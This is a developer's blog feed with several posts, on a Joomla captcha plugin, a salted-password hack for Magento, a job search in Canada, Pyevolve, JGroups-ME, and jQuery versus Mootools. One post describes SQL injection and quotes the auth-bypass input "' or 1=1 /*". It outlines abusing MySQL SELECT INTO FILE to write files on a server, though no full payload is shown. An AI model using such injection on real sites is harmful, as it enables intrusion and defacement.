who needs social life when you have broadband?

The Dev team has just released Joomla! 1.5 stable. This is great news (after two and a half years of development we finally can use the new baby in production environment) but I’ve seen that an old problem hasn’t been solved yet: people still get a lot of spam due to a weak (or nonexistent) mechanism to check if the e-mails sent through com_contact are from real people or spambots.

The beauty of open source is that anyone can change and improve a piece of software. So, here’s my $0.02: changing com_contact to make it can work with your favorite Captcha Plugin! (all files are downloadable at the end of this article)
Read more

Long time without new posts in my english blog sorry about that guys. I’ve been busy with the portuguese blog (wich gives me more feedback than this one…)

Last week I discovered Magento. This is the best opensource eCommerce I’ve seen so far. Unfortunately I haven’t seen to much activity by the core (three days and no commits in the SVN repository and none tested my sugestions to the code..). I guess it must be the holidays.

Anyways, the beuty of opensource is collaboration. So I started doing my part and implemented salted password in Magento.

Why?

We all know that Rainbow Tables are getting bigger and bigger everyday and while studying magento’s code I realised that they were storing password using a simple md5() function. That can be quite dangerous specially for a ecommerce software :).

In a couple hours I came up with this simple solution to implement salted passwords without messing Magento’s Core package (although you will need to change the database, so PLEASE!! I’M BEGGING YOU TO CREATE A BACKUP BEFORE TRYING THIS!)

Here is the README file:

Salted Passwords in Magento
—————————-

This is a hack. There are no guarantees that your system will remain working smoothly

Install
——–

1 - Make sure you change the size of your password field. You may run something like this in your MySQL:

ALTER TABLE `admin_user` CHANGE `password` `password` VARCHAR( 60 )

2 - Sign in in Magento admin (this is important because you’ll need to create a new user to start using salted passwords)

3 - Untar/Unzip this file in your root magento folder (all files will be placed under /community/ directory so u won’t loose anyting if it doesn’t work)

4 - Create a new magento user and give him administrator privileges (your current user won’t work anymore unless you change its password)

FAQ
—-

Q - I cannot login anymore!
A - I TOLD YOU TO LOGIN BEFORE UNZIPPING, you cannot login because the current users don’t use salted passwords and the new authentication method does. Here’s a workaround for this problem:

- Go to your phpMyAdmin (or any other software you use to manage your MySQL database)
- Browse the admin_user table
- Change your user’s password to: 5cf88201ea7be9037b934ec850c01a89:pQEuqfwbpJ
- Your new password is “changeMe” (without quotes)
- Login and change your password to the old one.

Now that you’ve read the README file you are ready to download and try salted passwords for Magento 0.7.1800

Download it here and let me know if it worked for you as well as it worked for me

Hello!

I’m not sure if this post is going to help me or not but I’m blogging anyway

Fact is I wanna move to Canada. I had enough of hot summer and would like to experience living abroad (again). So, if you are a Canadian please check my résumé clicking here and hire me hehehe. If you want, you may contact me directly by e-mail: bigodines ||at|| joomla.com.br

If you’re not sure if it will be worth to read my resume, I’m the main developer of two of the most famous Joomla! sites around the globe: Porsche and UNRIC (please note: developer != designer). Ok, that sound like I’m trying to impress :/. I don’t like these self-promotion lines but sometimes we need it

Now, the bad news:
I’ve been reading about visas and it seems that a permanent work-permit for skilled professionals (According to those HSMP calculators I found on the web I am a skilled professional :-P) can take up to 14 months. A friend told me that if I manage to find a company interested in my services, this waiting time may be shorter (I’m still checking this information).

There is also another alternative: I can go to Canada as a student and work legally 20hrs/week while waiting for my permanent visa… but first I need some networking contacts in Canada.

drop me a line if you need a responsible, dynamic, nerd web developer

today I’ve created my first Joomla! 1.5 extension. It’s a Captcha plugin. My friends were complaining that it was impossible to comment on my portuguese blog so I created this quick-and-funny captcha plugin which can be used with yvComment (or any component you want, because it is really generic).

I’m using the same structure as OSTCaptcha by CoolAcid, so the replacement should be transparent.

Download is available here

You may see a demo visiting my portuguese blog (see the comment plugin..)

Hello, this is my redemption post since the long time without activity on the blog. I’m working on complete Python genetic algorithms framework with many features, for a while is still under development, but there is an alpha version and some examples at the Google project hosting.

I’m doing the best efforts to release new versions soon as possible; I hope that this project will be used, since there are not good frameworks of GAs with easy use fashion in languages like Python.

http://code.google.com/p/pyevolve/

- Perone

Today I’ve finished migrating JGroups-ME to version 2.4.1sp4 of JGroups. I’ve also finished porting the GossipRouter (created a MobileGossipRouter midlet that initializes it) and now we have a 100% mobile group communication toolkit which allows the creation of group communication systems for mobile computing!

Next step is to implement Bluetooth support (I’ll do this just after I finish writing my paper about JGroups-ME) and submit my version to the JGroups project so they can take a look and (maybe) commit to the official JGroups-ME version.

more on this subject soon. please stay tunned ;P

We all know SQL Injection and a bunch of techniques to exploit this... I've decided to blog about a "new" one. Please don't consider this as "advanced sql injection" because its not

MySQL is a great database management system and it allows you to do many things with the "select" statement, wouldn't it be TOO many things?

I guess everyone knows the basic "' or 1=1 /*" an its variants... but accessing restricted areas, changing user infos and dropping tables aren't the only cool stuff you can do with sql injections.

There is a feature that allows you to save your select into a file. It's called SELECT INTO FILE (duh!) and things can get pretty dangerous if you use it with a sql injection.

Isn't it clear enough yet? Ok, let me try to help you get the big picture.

what if someone inserts this code:

please notice that you'll need to know the documentroot path but this shouldn't be a problem with vulnerable php systems.

Well, I'm not intended to give you a cookbook and promote n00bism. So, if you still didn't figure out how to take advantage of this, you probably shouldn't use it. Google might help you as well

happy hacking.

PS: syntax errors were generated on purpose.

Rember when I said I've found the best image generator class? It turned out that this class isn't everything I said previously. Actually it promises a lot of stuff, but still have too many bugs (for example, you cannot create a simple png with transparent background and I've also had trouble centralizing my text).

At least this class was well written and has been easy to customize.

I was looking for a dynamic title generator class and found this project. It is bloody easy to use/understand/modify and very flexible... I'm about to test the "bgimage" feature but I'm pretty impressed so far.

If you want to see what this library can do for you, check this website.

I've spend the whole afternoon yesterday trying to port my dynamic form generator made with JQuery to Mootools. I'm almost there (but "almost" is not "there" yet and the script is rising some really weird arbitrary errors. odd...). But why would I change from JQuery to Mootols?

That's a very interesting question (I'm actually asking myself every 5 minutes). The [partial] answers are the following:
- Joomla! 1.5 uses Mootools. As working with Joomla! still pay the bills around here, I must adapt to them
- I don't wanna load two different JS frameworks that do the same thing (or not!) in my components.
- It is always good to learn new stuff, even if, at the end your conclusion is: It was a total waste of time learning this crap. This sux! (as I did with Dojo).
- I need to post new stuff in my blog, what could be better than a comparison between JQuery && Mootools from a regular developer point-of-view? It's gonna be fun

For now, all I have to say is: [IMHO] Mootools' learning curve is longer than JQuery's.